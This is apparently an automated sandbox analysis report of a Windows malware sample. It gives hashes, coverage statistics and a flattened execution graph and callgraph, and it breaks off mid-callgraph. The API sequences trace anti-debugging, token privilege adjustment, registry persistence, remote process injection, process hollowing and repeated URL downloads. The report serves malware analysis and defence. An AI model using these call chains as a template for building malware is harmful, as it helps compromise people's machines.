                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8911C531A18B8685E750FF50EC443AA73A2FB84B46F400235D5CCC2665DF7CF8898B49

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:23.9%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:479
                                                                                                                                                                                                                        Total number of Limit Nodes:5
                                                                                                                                                                                                                        execution_graph 1444 7ff6ec841088 GetModuleHandleA GetProcAddress 1445 7ff6ec8410bb 1444->1445 836 7ff6ec84340c 896 7ff6ec84153c 836->896 841 7ff6ec84342c 1130 7ff6ec8440a4 GetCurrentProcess OpenProcessToken 841->1130 842 7ff6ec843424 ExitProcess 846 7ff6ec843447 847 7ff6ec84345c 846->847 848 7ff6ec8434ab 846->848 849 7ff6ec8441e4 3 API calls 847->849 853 7ff6ec8434fc 848->853 854 7ff6ec8434c0 848->854 850 7ff6ec843468 849->850 851 7ff6ec84346f 850->851 852 7ff6ec843482 ExitProcess 850->852 855 7ff6ec8441e4 3 API calls 851->855 862 7ff6ec843511 853->862 863 7ff6ec843552 853->863 856 7ff6ec8441e4 3 API calls 854->856 858 7ff6ec84347b 855->858 857 7ff6ec8434cc 856->857 859 7ff6ec8434db 857->859 860 7ff6ec8434d3 ExitProcess 857->860 858->852 861 7ff6ec84348a 858->861 1158 7ff6ec84320c 859->1158 1149 7ff6ec84329c 861->1149 1145 7ff6ec8441e4 CreateMutexExA 862->1145 1163 7ff6ec843a34 863->1163 868 7ff6ec8434e0 872 7ff6ec8434e7 Sleep 868->872 873 7ff6ec8434f4 ExitProcess 868->873 870 7ff6ec84348f 875 7ff6ec843496 Sleep 870->875 876 7ff6ec8434a3 ExitProcess 870->876 872->868 875->870 877 7ff6ec84352c 880 7ff6ec84320c 21 API calls 877->880 878 7ff6ec843524 ExitProcess 881 7ff6ec843531 880->881 884 7ff6ec843538 Sleep 881->884 885 7ff6ec843545 ExitProcess 881->885 882 7ff6ec84356a 886 7ff6ec8441e4 3 API calls 882->886 883 7ff6ec8435be CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 884->881 887 7ff6ec843576 886->887 888 7ff6ec843590 ExitProcess 887->888 889 7ff6ec8441e4 3 API calls 887->889 890 7ff6ec843589 889->890 890->888 891 7ff6ec843598 890->891 892 7ff6ec84329c 44 API calls 891->892 893 7ff6ec84359d 892->893 894 7ff6ec8435b1 ExitProcess 893->894 895 7ff6ec8435a4 Sleep 893->895 895->893 1173 7ff6ec84149c LoadLibraryA GetProcAddress 896->1173 898 7ff6ec8415bd 1174 7ff6ec84149c LoadLibraryA GetProcAddress 898->1174 900 7ff6ec8415d7 1175 7ff6ec8414ec LoadLibraryA GetProcAddress 900->1175 902 7ff6ec8415f1 1176 7ff6ec8414ec LoadLibraryA GetProcAddress 902->1176 904 7ff6ec84160b 1177 7ff6ec8414ec LoadLibraryA GetProcAddress 904->1177 906 7ff6ec841625 1178 7ff6ec8414ec LoadLibraryA GetProcAddress 906->1178 908 7ff6ec84163f 1179 7ff6ec8414ec LoadLibraryA GetProcAddress 908->1179 910 7ff6ec841659 1180 7ff6ec8414ec LoadLibraryA GetProcAddress 910->1180 912 7ff6ec841673 1181 7ff6ec8414ec LoadLibraryA GetProcAddress 912->1181 914 7ff6ec84168d 1182 7ff6ec8414ec LoadLibraryA GetProcAddress 914->1182 916 7ff6ec8416a7 1183 7ff6ec8414ec LoadLibraryA GetProcAddress 916->1183 918 7ff6ec8416c1 1184 7ff6ec84149c LoadLibraryA GetProcAddress 918->1184 920 7ff6ec8416db 1185 7ff6ec84149c LoadLibraryA GetProcAddress 920->1185 922 7ff6ec8416f5 1186 7ff6ec84149c LoadLibraryA GetProcAddress 922->1186 924 7ff6ec84170f 1187 7ff6ec84149c LoadLibraryA GetProcAddress 924->1187 926 7ff6ec841729 1188 7ff6ec8414ec LoadLibraryA GetProcAddress 926->1188 928 7ff6ec841743 1189 7ff6ec8414ec LoadLibraryA GetProcAddress 928->1189 930 7ff6ec84175d 1190 7ff6ec8414ec LoadLibraryA GetProcAddress 930->1190 932 7ff6ec841777 1191 7ff6ec8414ec LoadLibraryA GetProcAddress 932->1191 934 7ff6ec841791 1192 7ff6ec8414ec LoadLibraryA GetProcAddress 934->1192 936 7ff6ec8417ab 1193 7ff6ec8414ec LoadLibraryA GetProcAddress 936->1193 938 7ff6ec8417c5 1194 7ff6ec8414ec LoadLibraryA GetProcAddress 938->1194 940 7ff6ec8417df 1195 7ff6ec8414ec LoadLibraryA GetProcAddress 940->1195 942 7ff6ec8417f9 1196 7ff6ec8414ec LoadLibraryA GetProcAddress 942->1196 944 7ff6ec841813 1197 7ff6ec8414ec LoadLibraryA GetProcAddress 944->1197 946 7ff6ec84182d 1198 7ff6ec8414ec LoadLibraryA GetProcAddress 946->1198 948 7ff6ec841847 1199 7ff6ec8414ec LoadLibraryA GetProcAddress 948->1199 950 7ff6ec841861 1200 7ff6ec8414ec LoadLibraryA GetProcAddress 950->1200 952 7ff6ec84187b 1201 7ff6ec8414ec LoadLibraryA GetProcAddress 952->1201 954 7ff6ec841895 1202 7ff6ec8414ec LoadLibraryA GetProcAddress 954->1202 956 7ff6ec8418af 1203 7ff6ec8414ec LoadLibraryA GetProcAddress 956->1203 958 7ff6ec8418c9 1204 7ff6ec8414ec LoadLibraryA GetProcAddress 958->1204 960 7ff6ec8418e3 1205 7ff6ec8414ec LoadLibraryA GetProcAddress 960->1205 962 7ff6ec8418fd 1206 7ff6ec8414ec LoadLibraryA GetProcAddress 962->1206 964 7ff6ec841917 1207 7ff6ec8414ec LoadLibraryA GetProcAddress 964->1207 966 7ff6ec841931 1208 7ff6ec8414ec LoadLibraryA GetProcAddress 966->1208 968 7ff6ec84194b 1209 7ff6ec8414ec LoadLibraryA GetProcAddress 968->1209 970 7ff6ec841965 1210 7ff6ec8414ec LoadLibraryA GetProcAddress 970->1210 972 7ff6ec84197f 1211 7ff6ec8414ec LoadLibraryA GetProcAddress 972->1211 974 7ff6ec841999 1212 7ff6ec8414ec LoadLibraryA GetProcAddress 974->1212 976 7ff6ec8419b3 1213 7ff6ec8414ec LoadLibraryA GetProcAddress 976->1213 978 7ff6ec8419cd 1214 7ff6ec8414ec LoadLibraryA GetProcAddress 978->1214 980 7ff6ec8419e7 1215 7ff6ec8414ec LoadLibraryA GetProcAddress 980->1215 982 7ff6ec841a01 1216 7ff6ec8414ec LoadLibraryA GetProcAddress 982->1216 984 7ff6ec841a1b 1217 7ff6ec8414ec LoadLibraryA GetProcAddress 984->1217 986 7ff6ec841a35 1218 7ff6ec8414ec LoadLibraryA GetProcAddress 986->1218 988 7ff6ec841a4f 1219 7ff6ec8414ec LoadLibraryA GetProcAddress 988->1219 990 7ff6ec841a69 1220 7ff6ec8414ec LoadLibraryA GetProcAddress 990->1220 992 7ff6ec841a83 1221 7ff6ec8414ec LoadLibraryA GetProcAddress 992->1221 994 7ff6ec841a9d 1222 7ff6ec8414ec LoadLibraryA GetProcAddress 994->1222 996 7ff6ec841ab7 1223 7ff6ec8414ec LoadLibraryA GetProcAddress 996->1223 998 7ff6ec841ad1 1224 7ff6ec8414ec LoadLibraryA GetProcAddress 998->1224 1000 7ff6ec841aeb 1225 7ff6ec8414ec LoadLibraryA GetProcAddress 1000->1225 1002 7ff6ec841b05 1226 7ff6ec8414ec LoadLibraryA GetProcAddress 1002->1226 1004 7ff6ec841b1f 1227 7ff6ec8414ec LoadLibraryA GetProcAddress 1004->1227 1006 7ff6ec841b39 1228 7ff6ec8414ec LoadLibraryA GetProcAddress 1006->1228 1008 7ff6ec841b53 1229 7ff6ec8414ec LoadLibraryA GetProcAddress 1008->1229 1010 7ff6ec841b6d 1230 7ff6ec8414ec LoadLibraryA GetProcAddress 1010->1230 1012 7ff6ec841b87 1231 7ff6ec8414ec LoadLibraryA GetProcAddress 1012->1231 1014 7ff6ec841ba1 1232 7ff6ec8414ec LoadLibraryA GetProcAddress 1014->1232 1016 7ff6ec841bbb 1233 7ff6ec8414ec LoadLibraryA GetProcAddress 1016->1233 1018 7ff6ec841bd5 1234 7ff6ec8414ec LoadLibraryA GetProcAddress 1018->1234 1020 7ff6ec841bef 1235 7ff6ec8414ec LoadLibraryA GetProcAddress 1020->1235 1022 7ff6ec841c09 1236 7ff6ec8414ec LoadLibraryA GetProcAddress 1022->1236 1024 7ff6ec841c23 1237 7ff6ec8414ec LoadLibraryA GetProcAddress 1024->1237 1026 7ff6ec841c3d 1238 7ff6ec8414ec LoadLibraryA GetProcAddress 1026->1238 1028 7ff6ec841c57 1239 7ff6ec8414ec LoadLibraryA GetProcAddress 1028->1239 1030 7ff6ec841c71 1240 7ff6ec8414ec LoadLibraryA GetProcAddress 1030->1240 1032 7ff6ec841c8b 1241 7ff6ec8414ec LoadLibraryA GetProcAddress 1032->1241 1034 7ff6ec841ca5 1242 7ff6ec8414ec LoadLibraryA GetProcAddress 1034->1242 1036 7ff6ec841cbf 1243 7ff6ec8414ec LoadLibraryA GetProcAddress 1036->1243 1038 7ff6ec841cd9 1244 7ff6ec8414ec LoadLibraryA GetProcAddress 1038->1244 1040 7ff6ec841cf3 1245 7ff6ec8414ec LoadLibraryA GetProcAddress 1040->1245 1042 7ff6ec841d0d 1246 7ff6ec8414ec LoadLibraryA GetProcAddress 1042->1246 1044 7ff6ec841d27 1247 7ff6ec8414ec LoadLibraryA GetProcAddress 1044->1247 1046 7ff6ec841d41 1248 7ff6ec8414ec LoadLibraryA GetProcAddress 1046->1248 1048 7ff6ec841d5b 1249 7ff6ec8414ec LoadLibraryA GetProcAddress 1048->1249 1050 7ff6ec841d75 1250 7ff6ec8414ec LoadLibraryA GetProcAddress 1050->1250 1052 7ff6ec841d8f 1251 7ff6ec8414ec LoadLibraryA GetProcAddress 1052->1251 1054 7ff6ec841da9 1252 7ff6ec8414ec LoadLibraryA GetProcAddress 1054->1252 1056 7ff6ec841dc3 1253 7ff6ec8414ec LoadLibraryA GetProcAddress 1056->1253 1058 7ff6ec841ddd 1254 7ff6ec8414ec LoadLibraryA GetProcAddress 1058->1254 1060 7ff6ec841df7 1255 7ff6ec8414ec LoadLibraryA GetProcAddress 1060->1255 1062 7ff6ec841e11 1256 7ff6ec8414ec LoadLibraryA GetProcAddress 1062->1256 1064 7ff6ec841e2b 1257 7ff6ec8414ec LoadLibraryA GetProcAddress 1064->1257 1066 7ff6ec841e45 1258 7ff6ec8414ec LoadLibraryA GetProcAddress 1066->1258 1068 7ff6ec841e5f 1259 7ff6ec8414ec LoadLibraryA GetProcAddress 1068->1259 1070 7ff6ec841e79 1260 7ff6ec8414ec LoadLibraryA GetProcAddress 1070->1260 1072 7ff6ec841e93 1261 7ff6ec8414ec LoadLibraryA GetProcAddress 1072->1261 1074 7ff6ec841ead 1262 7ff6ec8414ec LoadLibraryA GetProcAddress 1074->1262 1076 7ff6ec841ec7 1263 7ff6ec8414ec LoadLibraryA GetProcAddress 1076->1263 1078 7ff6ec841ee1 1264 7ff6ec8414ec LoadLibraryA GetProcAddress 1078->1264 1080 7ff6ec841efb 1265 7ff6ec8414ec LoadLibraryA GetProcAddress 1080->1265 1082 7ff6ec841f15 1266 7ff6ec8414ec LoadLibraryA GetProcAddress 1082->1266 1084 7ff6ec841f2f 1267 7ff6ec8414ec LoadLibraryA GetProcAddress 1084->1267 1086 7ff6ec841f49 1268 7ff6ec8414ec LoadLibraryA GetProcAddress 1086->1268 1088 7ff6ec841f63 1269 7ff6ec8414ec LoadLibraryA GetProcAddress 1088->1269 1090 7ff6ec841f7d 1270 7ff6ec8414ec LoadLibraryA GetProcAddress 1090->1270 1092 7ff6ec841f97 1271 7ff6ec8414ec LoadLibraryA GetProcAddress 1092->1271 1094 7ff6ec841fb1 1272 7ff6ec84149c LoadLibraryA GetProcAddress 1094->1272 1096 7ff6ec841fcb 1273 7ff6ec8414ec LoadLibraryA GetProcAddress 1096->1273 1098 7ff6ec841fe5 1274 7ff6ec8414ec LoadLibraryA GetProcAddress 1098->1274 1100 7ff6ec841fff 1275 7ff6ec8414ec LoadLibraryA GetProcAddress 1100->1275 1102 7ff6ec842019 1276 7ff6ec8414ec LoadLibraryA GetProcAddress 1102->1276 1104 7ff6ec842033 1277 7ff6ec8414ec LoadLibraryA GetProcAddress 1104->1277 1106 7ff6ec84204d 1278 7ff6ec8414ec LoadLibraryA GetProcAddress 1106->1278 1108 7ff6ec842067 1279 7ff6ec8414ec LoadLibraryA GetProcAddress 1108->1279 1110 7ff6ec842081 1280 7ff6ec84149c LoadLibraryA GetProcAddress 1110->1280 1112 7ff6ec84209b 1281 7ff6ec84149c LoadLibraryA GetProcAddress 1112->1281 1114 7ff6ec8420b5 1282 7ff6ec8414ec LoadLibraryA GetProcAddress 1114->1282 1116 7ff6ec8420cf 1283 7ff6ec8414ec LoadLibraryA GetProcAddress 1116->1283 1118 7ff6ec8420e9 1284 7ff6ec8414ec LoadLibraryA GetProcAddress 1118->1284 1120 7ff6ec842103 1285 7ff6ec8414ec LoadLibraryA GetProcAddress 1120->1285 1122 7ff6ec84211d 1286 7ff6ec8414ec LoadLibraryA GetProcAddress 1122->1286 1124 7ff6ec842137 1287 7ff6ec8414ec LoadLibraryA GetProcAddress 1124->1287 1126 7ff6ec842151 1127 7ff6ec8431ac IsDebuggerPresent 1126->1127 1128 7ff6ec8431be GetCurrentProcess CheckRemoteDebuggerPresent 1127->1128 1129 7ff6ec8431ba 1127->1129 1128->1129 1129->841 1129->842 1131 7ff6ec8440ca GetTokenInformation 1130->1131 1132 7ff6ec843431 1130->1132 1288 7ff6ec843b14 VirtualAlloc 1131->1288 1141 7ff6ec843ca4 GetModuleFileNameW 1132->1141 1134 7ff6ec8440fb GetTokenInformation 1135 7ff6ec844128 CloseHandle 1134->1135 1136 7ff6ec844142 AdjustTokenPrivileges CloseHandle 1134->1136 1137 7ff6ec843ae4 VirtualFree 1135->1137 1289 7ff6ec843ae4 1136->1289 1138 7ff6ec84413d 1137->1138 1138->1132 1142 7ff6ec843ccf PathFindFileNameW wcslen 1141->1142 1143 7ff6ec843d92 wcsncpy 1141->1143 1144 7ff6ec843d09 1142->1144 1143->1144 1144->846 1146 7ff6ec84351d 1145->1146 1147 7ff6ec844210 GetLastError 1145->1147 1146->877 1146->878 1147->1146 1148 7ff6ec84421d CloseHandle 1147->1148 1148->1146 1292 7ff6ec843884 1149->1292 1151 7ff6ec8432ad 1295 7ff6ec844524 CreateFileW 1151->1295 1153 7ff6ec843307 CreateThread 1153->870 1154 7ff6ec8432c5 1154->1153 1307 7ff6ec844084 1154->1307 1159 7ff6ec843884 11 API calls 1158->1159 1160 7ff6ec84321c 1159->1160 1342 7ff6ec8442f4 CreateFileW 1160->1342 1164 7ff6ec843704 3 API calls 1163->1164 1165 7ff6ec843a5f 1164->1165 1166 7ff6ec843884 11 API calls 1165->1166 1167 7ff6ec843a69 GetModuleFileNameW DeleteFileW CopyFileW 1166->1167 1168 7ff6ec843557 1167->1168 1169 7ff6ec843aab SetFileAttributesW 1167->1169 1171 7ff6ec84339c GetVersionExW 1168->1171 1354 7ff6ec843974 RegOpenKeyExW 1169->1354 1172 7ff6ec8433cd 1171->1172 1172->882 1172->883 1173->898 1174->900 1175->902 1176->904 1177->906 1178->908 1179->910 1180->912 1181->914 1182->916 1183->918 1184->920 1185->922 1186->924 1187->926 1188->928 1189->930 1190->932 1191->934 1192->936 1193->938 1194->940 1195->942 1196->944 1197->946 1198->948 1199->950 1200->952 1201->954 1202->956 1203->958 1204->960 1205->962 1206->964 1207->966 1208->968 1209->970 1210->972 1211->974 1212->976 1213->978 1214->980 1215->982 1216->984 1217->986 1218->988 1219->990 1220->992 1221->994 1222->996 1223->998 1224->1000 1225->1002 1226->1004 1227->1006 1228->1008 1229->1010 1230->1012 1231->1014 1232->1016 1233->1018 1234->1020 1235->1022 1236->1024 1237->1026 1238->1028 1239->1030 1240->1032 1241->1034 1242->1036 1243->1038 1244->1040 1245->1042 1246->1044 1247->1046 1248->1048 1249->1050 1250->1052 1251->1054 1252->1056 1253->1058 1254->1060 1255->1062 1256->1064 1257->1066 1258->1068 1259->1070 1260->1072 1261->1074 1262->1076 1263->1078 1264->1080 1265->1082 1266->1084 1267->1086 1268->1088 1269->1090 1270->1092 1271->1094 1272->1096 1273->1098 1274->1100 1275->1102 1276->1104 1277->1106 1278->1108 1279->1110 1280->1112 1281->1114 1282->1116 1283->1118 1284->1120 1285->1122 1286->1124 1287->1126 1288->1134 1290 7ff6ec843b08 1289->1290 1291 7ff6ec843af5 VirtualFree 1289->1291 1290->1132 1291->1290 1326 7ff6ec843704 GetWindowsDirectoryW 1292->1326 1294 7ff6ec8438b3 8 API calls 1294->1151 1296 7ff6ec84457e 1295->1296 1297 7ff6ec844585 GetFileSize GetProcessHeap RtlAllocateHeap 1295->1297 1296->1154 1298 7ff6ec8445e0 ReadFile 1297->1298 1299 7ff6ec8445ce CloseHandle 1297->1299 1300 7ff6ec844607 GetProcessHeap HeapFree CloseHandle 1298->1300 1301 7ff6ec84462f 1298->1301 1299->1296 1300->1296 1302 7ff6ec844648 GetProcessHeap HeapFree CloseHandle 1301->1302 1304 7ff6ec844670 1301->1304 1302->1296 1303 7ff6ec8447db GetProcessHeap HeapFree CloseHandle 1303->1296 1304->1303 1305 7ff6ec84472b GetProcessHeap RtlAllocateHeap 1304->1305 1306 7ff6ec844774 1305->1306 1306->1303 1331 7ff6ec843fc4 CreateToolhelp32Snapshot 1307->1331 1310 7ff6ec8410d8 OpenProcess 1311 7ff6ec84111f 1310->1311 1312 7ff6ec841115 1310->1312 1338 7ff6ec8413c4 GetModuleHandleA GetProcAddress 1311->1338 1312->1153 1314 7ff6ec84112c 1314->1312 1315 7ff6ec8411fe VirtualAllocEx 1314->1315 1315->1312 1316 7ff6ec84124f WriteProcessMemory 1315->1316 1316->1312 1317 7ff6ec841286 WriteProcessMemory 1316->1317 1317->1312 1318 7ff6ec8412d1 1317->1318 1340 7ff6ec841444 GetSystemInfo 1318->1340 1321 7ff6ec8412fe GetModuleHandleA GetProcAddress 1321->1312 1323 7ff6ec841338 1321->1323 1322 7ff6ec841444 GetSystemInfo 1324 7ff6ec8412f4 1322->1324 1323->1312 1325 7ff6ec841399 CloseHandle 1323->1325 1324->1321 1324->1325 1325->1312 1327 7ff6ec843758 GetVolumeInformationW 1326->1327 1328 7ff6ec84374e 1326->1328 1330 7ff6ec8437d4 1327->1330 1328->1327 1329 7ff6ec84383e wsprintfW 1329->1294 1330->1329 1332 7ff6ec843fff Process32FirstW 1331->1332 1333 7ff6ec8432f2 1331->1333 1334 7ff6ec844059 CloseHandle 1332->1334 1335 7ff6ec84401e wcscmp 1332->1335 1333->1310 1334->1333 1336 7ff6ec844035 1335->1336 1337 7ff6ec844042 Process32NextW 1335->1337 1336->1334 1337->1334 1337->1335 1339 7ff6ec8413ff 1338->1339 1339->1314 1341 7ff6ec8412ea 1340->1341 1341->1321 1341->1322 1343 7ff6ec84436b GetLastError 1342->1343 1344 7ff6ec84434a 1342->1344 1346 7ff6ec84322f CreateThread Sleep CreateThread 1343->1346 1348 7ff6ec844244 GetFileSize 1344->1348 1346->868 1353 7ff6ec843b14 VirtualAlloc 1348->1353 1350 7ff6ec844270 1351 7ff6ec8442ba CloseHandle 1350->1351 1352 7ff6ec844284 SetFilePointer ReadFile 1350->1352 1351->1346 1352->1351 1353->1350 1355 7ff6ec8439b9 RegSetValueExW RegCloseKey 1354->1355 1356 7ff6ec8439b5 1354->1356 1355->1356 1356->1168 1357 7ff6ec84333c 1360 7ff6ec8424cc GetModuleFileNameW 1357->1360 1361 7ff6ec84254d 1360->1361 1367 7ff6ec842548 1360->1367 1362 7ff6ec84258b 1361->1362 1363 7ff6ec8425a1 1361->1363 1364 7ff6ec8425bf 1362->1364 1365 7ff6ec842595 1362->1365 1403 7ff6ec84240c ExpandEnvironmentStringsW 1363->1403 1404 7ff6ec84244c ExpandEnvironmentStringsW 1364->1404 1365->1367 1405 7ff6ec84248c ExpandEnvironmentStringsW 1365->1405 1368 7ff6ec8425b6 1368->1367 1371 7ff6ec842611 CreateProcessW 1368->1371 1371->1367 1372 7ff6ec84266c CreateFileW 1371->1372 1372->1367 1373 7ff6ec8426b3 GetFileSize 1372->1373 1374 7ff6ec8426db CloseHandle 1373->1374 1375 7ff6ec8426d1 1373->1375 1374->1367 1375->1374 1376 7ff6ec8426eb VirtualAlloc 1375->1376 1377 7ff6ec842725 ReadFile 1376->1377 1378 7ff6ec842715 CloseHandle 1376->1378 1379 7ff6ec842775 CloseHandle GetThreadContext 1377->1379 1380 7ff6ec842752 VirtualFree CloseHandle 1377->1380 1378->1367 1381 7ff6ec8427dd ReadProcessMemory GetModuleHandleA GetProcAddress 1379->1381 1382 7ff6ec8427c5 VirtualFree 1379->1382 1380->1367 1383 7ff6ec842860 1381->1383 1382->1367 1384 7ff6ec84287c VirtualAllocEx 1383->1384 1385 7ff6ec842864 VirtualFree 1383->1385 1386 7ff6ec8428e7 VirtualFree 1384->1386 1387 7ff6ec8428ff WriteProcessMemory 1384->1387 1385->1367 1386->1367 1388 7ff6ec842935 VirtualFree 1387->1388 1390 7ff6ec84294d 1387->1390 1388->1367 1389 7ff6ec842983 WriteProcessMemory 1389->1390 1391 7ff6ec842a0e VirtualFree 1389->1391 1390->1389 1395 7ff6ec842a2b 1390->1395 1391->1367 1392 7ff6ec842a9d RtlCompareMemory 1394 7ff6ec842af0 1392->1394 1392->1395 1393 7ff6ec842d1c WriteProcessMemory SetThreadContext 1396 7ff6ec842db7 ResumeThread 1393->1396 1397 7ff6ec842da2 VirtualFree 1393->1397 1400 7ff6ec842d17 1394->1400 1401 7ff6ec842c20 ReadProcessMemory WriteProcessMemory 1394->1401 1395->1392 1395->1393 1398 7ff6ec842dc9 VirtualFree 1396->1398 1399 7ff6ec842dde VirtualFree 1396->1399 1397->1367 1398->1367 1399->1367 1400->1393 1401->1394 1402 7ff6ec842cf5 VirtualFree 1401->1402 1402->1367 1403->1368 1404->1368 1405->1368 1406 7ff6ec84306c 1411 7ff6ec843075 1406->1411 1407 7ff6ec843161 1410 7ff6ec843be4 RegDeleteKeyW 1410->1411 1411->1407 1411->1410 1412 7ff6ec843de4 9 API calls 1411->1412 1413 7ff6ec843974 3 API calls 1411->1413 1415 7ff6ec844404 CreateFileW 1411->1415 1420 7ff6ec843b44 RegOpenKeyExW 1411->1420 1412->1411 1414 7ff6ec843151 Sleep 1413->1414 1414->1411 1416 7ff6ec84449a 1415->1416 1417 7ff6ec84445f 1415->1417 1416->1411 1423 7ff6ec844384 SetFilePointer WriteFile SetEndOfFile 1417->1423 1419 7ff6ec84447b SetFileAttributesW CloseHandle 1419->1416 1421 7ff6ec843b98 RegSetValueExW RegCloseKey 1420->1421 1422 7ff6ec843bd2 1420->1422 1421->1422 1422->1411 1423->1419 1424 7ff6ec84335c 1425 7ff6ec8424cc 36 API calls 1424->1425 1426 7ff6ec84336f 1425->1426 1446 7ff6ec84317c 1447 7ff6ec843185 1446->1447 1448 7ff6ec84319e 1447->1448 1451 7ff6ec842ffc 1447->1451 1456 7ff6ec842dfc CreateMutexA 1451->1456 1454 7ff6ec843017 Sleep CreateThread WaitForSingleObject 1455 7ff6ec84305c Sleep 1454->1455 1455->1447 1457 7ff6ec842e28 ReleaseMutex CloseHandle 1456->1457 1458 7ff6ec842e45 GetLastError 1456->1458 1459 7ff6ec842e87 1457->1459 1460 7ff6ec842e6f ReleaseMutex CloseHandle 1458->1460 1461 7ff6ec842e52 ReleaseMutex CloseHandle 1458->1461 1459->1454 1459->1455 1460->1459 1461->1459 1465 7ff6ec842f2c 1466 7ff6ec843884 11 API calls 1465->1466 1467 7ff6ec842f6b 1466->1467 1468 7ff6ec844524 17 API calls 1467->1468 1469 7ff6ec842f8f 1468->1469 1470 7ff6ec844084 5 API calls 1469->1470 1471 7ff6ec842fb2 1470->1471 1472 7ff6ec8410d8 10 API calls 1471->1472 1473 7ff6ec842fc7 GetProcessHeap HeapFree 1472->1473 1474 7ff6ec842e9c CreateMutexA 1475 7ff6ec842ec1 ReleaseMutex CloseHandle 1474->1475 1476 7ff6ec842ede GetLastError 1474->1476 1477 7ff6ec842f20 1475->1477 1478 7ff6ec842f08 ReleaseMutex CloseHandle 1476->1478 1479 7ff6ec842eeb ReleaseMutex CloseHandle 1476->1479 1478->1477 1479->1477 1427 7ff6ec842160 1428 7ff6ec84218a InternetOpenW 1427->1428 1429 7ff6ec8421b7 Sleep 1428->1429 1430 7ff6ec8421c4 InternetOpenUrlW 1428->1430 1429->1428 1431 7ff6ec84224d HttpQueryInfoA 1430->1431 1432 7ff6ec8421fb InternetOpenUrlW 1430->1432 1434 7ff6ec84227c InternetCloseHandle InternetCloseHandle Sleep 1431->1434 1435 7ff6ec8422a2 1431->1435 1432->1431 1433 7ff6ec842232 InternetCloseHandle Sleep 1432->1433 1433->1428 1434->1428 1436 7ff6ec842309 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1435->1436 1437 7ff6ec8422ac InternetCloseHandle InternetOpenUrlW 1435->1437 1438 7ff6ec842388 1436->1438 1439 7ff6ec84236e InternetCloseHandle InternetCloseHandle 1436->1439 1437->1436 1440 7ff6ec8422ee InternetCloseHandle Sleep 1437->1440 1442 7ff6ec842390 InternetReadFile 1438->1442 1443 7ff6ec8423de InternetCloseHandle InternetCloseHandle 1438->1443 1441 7ff6ec842407 1439->1441 1440->1428 1442->1438 1442->1443 1443->1441

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                                        callgraph 0 Function_00007FF6EC8424CC 29 Function_00007FF6EC84240C 0->29 53 Function_00007FF6EC84244C 0->53 84 Function_00007FF6EC84248C 0->84 1 Function_00007FF6EC84B2C8 2 Function_00007FF6EC84B0D5 3 Function_00007FF6EC8436D4 4 Function_00007FF6EC843ED4 5 Function_00007FF6EC8435B9 6 Function_00007FF6EC84D7BB 7 Function_00007FF6EC8436BC 8 Function_00007FF6EC84BFB8 9 Function_00007FF6EC843FC4 10 Function_00007FF6EC8413C4 11 Function_00007FF6EC84F4EB 12 Function_00007FF6EC84F4E7 13 Function_00007FF6EC84D2E7 14 Function_00007FF6EC8414EC 15 Function_00007FF6EC84D2E9 16 Function_00007FF6EC84F4E9 17 Function_00007FF6EC8442F4 67 Function_00007FF6EC844244 17->67 18 Function_00007FF6EC8502F0 19 Function_00007FF6EC8410D8 19->10 43 Function_00007FF6EC841000 19->43 66 Function_00007FF6EC841444 19->66 20 Function_00007FF6EC84D2E2 21 Function_00007FF6EC84C2E4 22 Function_00007FF6EC84D2E5 23 Function_00007FF6EC8441E4 24 Function_00007FF6EC843AE4 25 Function_00007FF6EC843BE4 26 Function_00007FF6EC843DE4 27 Function_00007FF6EC84CCE1 28 Function_00007FF6EC84D70A 30 Function_00007FF6EC84320C 30->17 92 Function_00007FF6EC843884 30->92 31 Function_00007FF6EC84340C 31->4 31->23 31->30 48 Function_00007FF6EC843A34 31->48 61 Function_00007FF6EC84153C 31->61 97 Function_00007FF6EC8431AC 31->97 107 Function_00007FF6EC84339C 31->107 108 Function_00007FF6EC84329C 31->108 111 Function_00007FF6EC8440A4 31->111 112 Function_00007FF6EC843CA4 31->112 32 Function_00007FF6EC84E408 33 Function_00007FF6EC84E812 34 Function_00007FF6EC84FD12 35 Function_00007FF6EC843B14 36 Function_00007FF6EC84EA11 37 Function_00007FF6EC84BBFB 38 Function_00007FF6EC84BBF7 39 Function_00007FF6EC842FFC 40 Function_00007FF6EC842DFC 39->40 41 Function_00007FF6EC84C4F8 42 Function_00007FF6EC84BBF9 44 Function_00007FF6EC844404 94 Function_00007FF6EC844384 44->94 45 Function_00007FF6EC843704 45->3 46 Function_00007FF6EC842F2C 46->19 50 Function_00007FF6EC843C24 46->50 51 Function_00007FF6EC844524 46->51 46->92 93 Function_00007FF6EC844084 46->93 47 Function_00007FF6EC84E129 48->45 75 Function_00007FF6EC843974 48->75 48->92 49 Function_00007FF6EC84E12F 103 Function_00007FF6EC8444B4 51->103 52 Function_00007FF6EC84354D 54 Function_00007FF6EC84B052 55 Function_00007FF6EC84E454 56 Function_00007FF6EC84E155 57 Function_00007FF6EC84B04E 58 Function_00007FF6EC84C14F 59 Function_00007FF6EC84B250 60 Function_00007FF6EC84E151 61->14 106 Function_00007FF6EC84149C 61->106 62 Function_00007FF6EC84333C 62->0 63 Function_00007FF6EC84C038 64 Function_00007FF6EC84F443 65 Function_00007FF6EC84DB44 67->35 68 Function_00007FF6EC843B44 69 Function_00007FF6EC850340 70 Function_00007FF6EC84E46C 71 Function_00007FF6EC84FA6D 72 Function_00007FF6EC84306C 72->25 72->26 72->44 72->68 72->75 73 Function_00007FF6EC84B772 74 Function_00007FF6EC84C874 76 Function_00007FF6EC84B05A 77 Function_00007FF6EC84335C 77->0 78 Function_00007FF6EC84EB58 79 Function_00007FF6EC84FD58 80 Function_00007FF6EC842160 81 Function_00007FF6EC84E465 82 Function_00007FF6EC84B061 83 Function_00007FF6EC841088 85 Function_00007FF6EC84F67D 86 Function_00007FF6EC84B776 87 Function_00007FF6EC84317C 87->39 88 Function_00007FF6EC84337C 88->0 89 Function_00007FF6EC84B277 90 Function_00007FF6EC84B778 91 Function_00007FF6EC84147F 92->45 93->9 95 Function_00007FF6EC84B180 96 